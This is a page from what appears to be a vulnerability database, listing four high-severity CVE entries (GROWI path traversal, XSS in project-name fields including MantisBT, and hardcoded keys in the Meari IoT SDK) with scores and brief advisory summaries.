EPSS
0.0%
CVE-2026-41951 HIGH This Week

Remote path traversal in GROWI v7.5.0 and earlier allows authenticated administrators to execute arbitrary EJS templates on the server when an email server is configured. The vulnerability enables template injection through directory traversal, potentially leading to remote code execution. Exploitation requires high privileges (administrator role) and a specific deployment configuration with email server functionality enabled. No active exploitation confirmed in CISA KEV, but CVSS 8.6 reflects the severity of arbitrary code execution impact once prerequisites are met.

Path Traversal Growi
NVD VulDB
CVSS 4.0
8.6
EPSS
0.0%
CVE-2026-44655 HIGH PATCH GHSA This Week

Unescaped Project Name allows an attacker that can set it (which typically requires manager or administrator access level) to inject HTML in Move Attachments admin page. Cross-site scripting (XSS). This is mitigated by Content Security Policy which restricts scripts execution. - 5cb4b469295889f5d2b01677c9bf82c143e0fdaa None

XSS
NVD GitHub VulDB
CVSS 4.0
8.6
EPSS
0.0%
CVE-2026-34463 HIGH PATCH GHSA This Week

Stored HTML injection and cross-site scripting in MantisBT versions 2.28.1 and earlier allows a privileged user (manager or administrator) to inject HTML through a Project's name field, which is later rendered unescaped on the issue clone form (bug_report_page.php) when cloning issues across projects. The flaw is mitigated by MantisBT's default Content Security Policy, which blocks inline script execution, and no public exploit identified at time of analysis. The CVSS 4.0 score of 8.6 reflects high confidentiality, integrity, and availability impacts on the vulnerable component despite requiring high privileges.

XSS PHP
NVD GitHub VulDB
CVSS 4.0
8.6
EPSS
0.0%
CVE-2026-33362 HIGH This Week

Remote unauthenticated attackers can decrypt user credentials and hijack IoT device sessions in Meari SDK-based mobile applications (CloudEdge, Arenti, white-label apps) by exploiting hardcoded cryptographic keys shared across all installations. The SDK embeds API signing secrets, password-transport encryption keys, and service access tokens in application binaries, enabling adversaries to intercept and decrypt account credentials in transit, forge authenticated API requests, and potentially access cloud services without user authentication. No public exploit code identified at time of analysis, but EPSS scoring and exploitation complexity are low given the static nature of hardcoded secrets.

Information Disclosure Google
NVD GitHub
CVSS 3.1
8.6
EPSS
0.0%
Page 1 of 8 Next

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy